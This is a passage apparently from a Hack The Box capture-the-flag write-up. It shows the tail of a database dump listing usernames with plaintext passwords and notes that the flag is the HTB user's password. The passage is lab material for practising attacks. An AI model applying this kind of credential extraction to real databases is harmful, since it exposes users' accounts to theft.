| tmatieu4b | c5PYl7yfJi |
| ielsy4c | 3hLC705Oj |
| ebotwood4d | aQmW5c7 |
| gcirlos4e | SPsU9obCa |
| smucklestone4f | Ho96mUx |
| hdain4g | BGMRtb |
| dmcquillin4h | 37kwHEdFhAlL |
| gfolan4i | 1d9kcofM |
| gtamlett4j | 4HlL18RM37l3 |
| cchapelle4k | xezsRgOt8OW8 |
| channy4l | 68lHKp |
| ffennick4m | jNLpCeyoYY |
| mmcgarrell4n | Ttvat7WvkI |
| mmcdowell4o | jfOR6B |
| sconquer4p | ase5Qid5vWD |
| hskune4q | UUoqC30g5w |
| mblasli4r | dcjNDHzrA |
| sefford4s | ui0r4FKwD38 |
| gscotter4t | f2vUKUzHLmEW |
| nmenhenitt4u | gXHceINuKdF |
| laldridge4v | 7o4agC3m |
| rlingner4w | 8mYREIR7 |
| mmcfall4x | sd3N0GDK |
| smoscon4y | BCPAyKFkKKL |
| ggillespey4z | LHyQ7f4Br |
| onewberry50 | aKdinUPQ9r |
| dinsley51 | hy8agAF9c4VS |
| mcommon52 | Buh2VR |
| bmosdill53 | IgNAGOBrzlu |
| rrobart54 | SkBqsiQGSK |
| hdurrance55 | 1cljoZoy7Fc |
| hwinterflood56 | F9PH0X0 |
| jbier57 | Ug88Nd37N96v |
| hmaccumeskey58 | 3rb3rz2kq2 |
| orangell59 | IWz01iHsv |
| velsie5a | mWcslVm2 |
| igeorgelin5b | 6WHS6OS |
| rrushsorth5c | hXiQn9bW6W |
| mbrucker5d | cT5Z6K |
| darnull5e | EzagIo6Sd |
| jparkhouse5f | HCEchNzf |
| smcgunley5g | 9ivT96O |
| ssoal5h | qi6WX7TGIA |
| npeak5i | 3gR7Iuc0 |
| mleidl5j | qwfjY9RGk6 |
+-------------------+------------------------------+
200 rows in set (0.01 sec)
We find the flag is in the password field for the HTB user.
| HTB | cr3n4o7rzse7rzhnckhssncif7ds |